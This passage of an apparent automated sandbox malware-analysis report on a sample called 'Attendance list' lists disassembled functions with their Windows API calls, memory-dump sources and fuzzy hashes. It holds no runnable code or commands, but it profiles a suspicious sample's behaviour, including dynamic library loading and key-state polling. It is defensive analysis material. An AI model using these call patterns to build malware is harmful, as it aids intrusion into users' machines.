                        • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0093DC3B
                        • GetProcAddress.KERNEL32(00000000,?), ref: 0093DCBE
                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0093DCDA
                        • GetProcAddress.KERNEL32(00000000,?), ref: 0093DD1B
                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0093DD35
                          • Part of subcall function 008C5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00927B20,?,?,00000000), ref: 008C5B8C
                          • Part of subcall function 008C5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00927B20,?,?,00000000,?,?), ref: 008C5BB0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                        • String ID:
                        • API String ID: 327935632-0
                        • Opcode ID: 3e2add7c33ab860957f6ff8ab245d79f0b875361633b100ed3cc4c097a9c3014
                        • Instruction ID: f129157ff1a0ade640a5b4df4182ec1fb95c8b7ced0c2711c219485e1c655ed6
                        • Opcode Fuzzy Hash: 3e2add7c33ab860957f6ff8ab245d79f0b875361633b100ed3cc4c097a9c3014
                        • Instruction Fuzzy Hash: A6510435A04205DFCB00EF68D494DADB7F4FF49310B0580A9E859AB252DB30ED45CF91
                        Function 0092E7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                        Download Yara Rule
                        APIs
                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0092E88A
                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0092E8B3
                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0092E8F2
                          • Part of subcall function 008C9997: __itow.LIBCMT ref: 008C99C2
                          • Part of subcall function 008C9997: __swprintf.LIBCMT ref: 008C9A0C
                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0092E917
                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0092E91F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                        • String ID:
                        • API String ID: 1389676194-0
                        • Opcode ID: 4765644f4cce31845296a34fa57743b9e2edd8d0ba672b3d27e3e4033955e08b
                        • Instruction ID: 1c3312f955575dedfc914d4f3d7072a431b0d16758cdb5f77cf6412581a77ce5
                        • Opcode Fuzzy Hash: 4765644f4cce31845296a34fa57743b9e2edd8d0ba672b3d27e3e4033955e08b
                        • Instruction Fuzzy Hash: 4B511539A00215DFCF01EF68C985EAABBF5FF09310B1480A9E849AB361CB31ED51DB51
                        Function 0094A2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 258d2c518316735637fb8937a44a11d51181786dabad8ab65b47d86b6a3454cf
                        • Instruction ID: cf9eb0540ce8b69c659be8d4a53b30824237717ab5ee772ba51e00bcd5d2a36e
                        • Opcode Fuzzy Hash: 258d2c518316735637fb8937a44a11d51181786dabad8ab65b47d86b6a3454cf
                        • Instruction Fuzzy Hash: B5412439984204AFC724DF28CC58FB9BBA8FB09320F144165F819A72E0E770AD41DB51
                        Function 008C2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • GetCursorPos.USER32(?), ref: 008C2357
                        • ScreenToClient.USER32(009867B0,?), ref: 008C2374
                        • GetAsyncKeyState.USER32(00000001), ref: 008C2399
                        • GetAsyncKeyState.USER32(00000002), ref: 008C23A7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: AsyncState$ClientCursorScreen
                        • String ID:
                        • API String ID: 4210589936-0
                        • Opcode ID: 039c3d06f512cbb58fe4023c2626d7bd7588186f465c42e665e4d1da6c86a0ce
                        • Instruction ID: 23ef52c2edc37d027f692e8dd66a2157c65a00a4cf05f61c44e516d3c7b06934
                        • Opcode Fuzzy Hash: 039c3d06f512cbb58fe4023c2626d7bd7588186f465c42e665e4d1da6c86a0ce
                        • Instruction Fuzzy Hash: ED415B7550415DFBDB159F78C844FEABB74FB45324F20431AE928D22E0C735AA90DB91
                        Function 00916920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                        Download Yara Rule
                        APIs
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0091695D
                        • TranslateAcceleratorW.USER32(?,?,?), ref: 009169A9
                        • TranslateMessage.USER32(?), ref: 009169D2
                        • DispatchMessageW.USER32(?), ref: 009169DC
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009169EB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Message$PeekTranslate$AcceleratorDispatch
                        • String ID:
                        • API String ID: 2108273632-0
                        • Opcode ID: ba1f72508bde0289d4594c01d656faf6e63e0cb754bc26040da4b1c983583d56
                        • Instruction ID: 3386021e63e212652206ff348372775aaf325e9bdd0c45e0311c584ae194f1e1
                        • Opcode Fuzzy Hash: ba1f72508bde0289d4594c01d656faf6e63e0cb754bc26040da4b1c983583d56
                        • Instruction Fuzzy Hash: 6831A171F1824AAFDB21CF749C44FF67BACAB02304F1445A9E425DA2A1D73498C5EBA0
                        Function 00918F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                        Download Yara Rule
                        APIs
                        • GetWindowRect.USER32(?,?), ref: 00918F12
                        • PostMessageW.USER32(?,00000201,00000001), ref: 00918FBC
                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00918FC4
                        • PostMessageW.USER32(?,00000202,00000000), ref: 00918FD2
                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00918FDA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: MessagePostSleep$RectWindow
                        • String ID:
                        • API String ID: 3382505437-0
                        • Opcode ID: 40ba1f24107427fadb409e93d7b5fee24509f74b82d423a7d252ec30159adfa2
                        • Instruction ID: 8e519104f7e917f019d96e1cf846e2cdc4eba8e4aeea9887f18fcf2dafe352c1
                        • Opcode Fuzzy Hash: 40ba1f24107427fadb409e93d7b5fee24509f74b82d423a7d252ec30159adfa2
                        • Instruction Fuzzy Hash: C231EE71A0421EEFDB00CF68D94CADF7BBAEB05315F104229F924EA2D0C7B09954EB90
                        Function 0091B6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                        Download Yara Rule
                        APIs
                        • IsWindowVisible.USER32(?), ref: 0091B6C7
                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0091B6E4
                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0091B71C
                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0091B742
                        • _wcsstr.LIBCMT ref: 0091B74C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                        • String ID:
                        • API String ID: 3902887630-0
                        • Opcode ID: 83fe0ec18b8a38445b6ceb35e7e5c615146849b0651cca820216b2abc2764444
                        • Instruction ID: f5eb4f54fc9ff672828816b07d88136bbfff0929d787f72645ea46914aae76ba
                        • Opcode Fuzzy Hash: 83fe0ec18b8a38445b6ceb35e7e5c615146849b0651cca820216b2abc2764444
                        • Instruction Fuzzy Hash: BE21FC36304249BBEB255B399C4DEBB7B9DEF46760F004039FC05CA1A1EF61DC809651
                        Function 0094B405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C2612: GetWindowLongW.USER32(?,000000EB), ref: 008C2623
                        • GetWindowLongW.USER32(?,000000F0), ref: 0094B44C
                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0094B471
                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0094B489
                        • GetSystemMetrics.USER32(00000004), ref: 0094B4B2
                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00931184,00000000), ref: 0094B4D0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Window$Long$MetricsSystem
                        • String ID:
                        • API String ID: 2294984445-0
                        • Opcode ID: fc60b375ccf06e7f02f402a2407cdef18245db8a06f40243ba9463f1ec3a7dbf
                        • Instruction ID: 0f18ae34f204b270090e1f402c588ece3e32b09550e62849ae4e00dde6774eaa
                        • Opcode Fuzzy Hash: fc60b375ccf06e7f02f402a2407cdef18245db8a06f40243ba9463f1ec3a7dbf
                        • Instruction Fuzzy Hash: 48213071924266AFCB149F39DC54E6A37A8FB05721F154B28F926D62F1E730D810DB90
                        Function 009197E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00919802
                          • Part of subcall function 008C7D2C: _memmove.LIBCMT ref: 008C7D66
                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00919834
                        • __itow.LIBCMT ref: 0091984C
                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00919874
                        • __itow.LIBCMT ref: 00919885
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: MessageSend$__itow$_memmove
                        • String ID:
                        • API String ID: 2983881199-0
                        • Opcode ID: 158595a7c77a62032cd80984470039891d2855c87bb3ce97baef8ddf22cb09ce
                        • Instruction ID: 590b9e578f539d80aab29b444a91723bd203abb7e806ace2a8c5185f2a2b8862
                        • Opcode Fuzzy Hash: 158595a7c77a62032cd80984470039891d2855c87bb3ce97baef8ddf22cb09ce
                        • Instruction Fuzzy Hash: 3321C83170120CABDB10AA699C9AFEE7BBDEF4AB14F044079FD05DB251D670CD819792
                        Function 008C12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                        Download Yara Rule
                        APIs
                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008C134D
                        • SelectObject.GDI32(?,00000000), ref: 008C135C
                        • BeginPath.GDI32(?), ref: 008C1373
                        • SelectObject.GDI32(?,00000000), ref: 008C139C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ObjectSelect$BeginCreatePath
                        • String ID:
                        • API String ID: 3225163088-0
                        • Opcode ID: b5512fa7e8f443ce9273a32fa3b53ffaa642ef66d274d113d569b2d2f0505d93
                        • Instruction ID: a8298bd66b1a0179a24293ae1b1d263b41185c068af29d6f15cd2f71ef248921
                        • Opcode Fuzzy Hash: b5512fa7e8f443ce9273a32fa3b53ffaa642ef66d274d113d569b2d2f0505d93
                        • Instruction Fuzzy Hash: 89219270828248DFDF108F65DC48B697BB8FB01355F14822AF815DA7A1D775D891EB90
                        Function 0091C161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: _memcmp
                        • String ID:
                        • API String ID: 2931989736-0
                        • Opcode ID: 38bbc35946d1877da9f07d98f52c2653c3d18da3c9e6789e7f5330494f078a5d
                        • Instruction ID: fec89249d43b38942a3277400d8a8bf3f7f4e82f6db90b8d87dae2e40c6b1592
                        • Opcode Fuzzy Hash: 38bbc35946d1877da9f07d98f52c2653c3d18da3c9e6789e7f5330494f078a5d
                        • Instruction Fuzzy Hash: A601B5F27C810D7BE604E6269D46FEB739CEB62398F444025FD04E6293E660DE5583E2
                        Function 00924D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentThreadId.KERNEL32 ref: 00924D5C
                        • __beginthreadex.LIBCMT ref: 00924D7A
                        • MessageBoxW.USER32(?,?,?,?), ref: 00924D8F
                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00924DA5
                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00924DAC
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                        • String ID:
                        • API String ID: 3824534824-0
                        • Opcode ID: 337ddbee5c5204f0499919cd5ec92bbcba1157c077a0547f92b261479ddeacb4
                        • Instruction ID: 8f83ed76f324391000c317a651e6404bb0a25869938e440adc908e164f168754
                        • Opcode Fuzzy Hash: 337ddbee5c5204f0499919cd5ec92bbcba1157c077a0547f92b261479ddeacb4
                        • Instruction Fuzzy Hash: A1114876918258FBC7008FA8EC04E9A7FACEB85320F144265F924D7390C6748C0087A0
                        Function 0091874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00918766
                        • GetLastError.KERNEL32(?,0091822A,?,?,?), ref: 00918770
                        • GetProcessHeap.KERNEL32(00000008,?,?,0091822A,?,?,?), ref: 0091877F
                        • HeapAlloc.KERNEL32(00000000,?,0091822A,?,?,?), ref: 00918786
                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0091879D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                        • String ID:
                        • API String ID: 842720411-0
                        • Opcode ID: 7ad54fe74ef390411a0bf2b657477289b330a2d2129c6272830e07742a7aafc0
                        • Instruction ID: 0fb10c9aa963dacd7e1bbc6333f29842a404e7bbbcbaff0e14966cd0628a50af
                        • Opcode Fuzzy Hash: 7ad54fe74ef390411a0bf2b657477289b330a2d2129c6272830e07742a7aafc0
                        • Instruction Fuzzy Hash: 93016D75314209FFDB205FA6DC98DAB7BACFF8A3557200439F949C2260DA318C40EA60
                        Function 009254E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                        Download Yara Rule
                        APIs
                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00925502
                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00925510
                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00925518
                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00925522
                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0092555E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: PerformanceQuery$CounterSleep$Frequency
                        • String ID:
                        • API String ID: 2833360925-0
                        • Opcode ID: 375636ca32d9cc07d49d58178bd569e5c9f381588c9c7d607304f8bf876e651c
                        • Instruction ID: a0ab637ec7a7ba94dea0ca0b329d09312e53fb00eb039986cecd7c586b97c537
                        • Opcode Fuzzy Hash: 375636ca32d9cc07d49d58178bd569e5c9f381588c9c7d607304f8bf876e651c
                        • Instruction Fuzzy Hash: C7013975C18A2ADBCF00ABE8E8989EDBB78BB0A711F010456E901F2144DB3455549BA1
                        Function 00917652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                        Download Yara Rule
                        APIs
                        • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0091758C,80070057,?,?,?,0091799D), ref: 0091766F
                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0091758C,80070057,?,?), ref: 0091768A
                        • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0091758C,80070057,?,?), ref: 00917698
                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0091758C,80070057,?), ref: 009176A8
                        • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0091758C,80070057,?,?), ref: 009176B4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: From$Prog$FreeStringTasklstrcmpi
                        • String ID:
                        • API String ID: 3897988419-0
                        • Opcode ID: 4884e1cc0862a4c063eb39e979b40138a6d821b2d630feb56128bb222eae4189
                        • Instruction ID: c2f00798769271c438e915d4f19bfa8f4ca3e108d7e0e0c86f9bd46ddcda409d
                        • Opcode Fuzzy Hash: 4884e1cc0862a4c063eb39e979b40138a6d821b2d630feb56128bb222eae4189
                        • Instruction Fuzzy Hash: AF01717671560AABDB105F98DC44EAABBBDEB45791F140028FD05D7211E731DD8097A0
                        Function 009185F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00918608
                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00918612
                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00918621
                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00918628
                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0091863E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: HeapInformationToken$AllocErrorLastProcess
                        • String ID:
                        • API String ID: 44706859-0
                        • Opcode ID: 1c2c3cc59c03a545672596fa1d295b16b3945ffaf8c8c9a1ed4331be2f3a6d86
                        • Instruction ID: 7728462a5aefcf5e290c2e741333656db7de9242f4f7626e3db3fe33335754f9
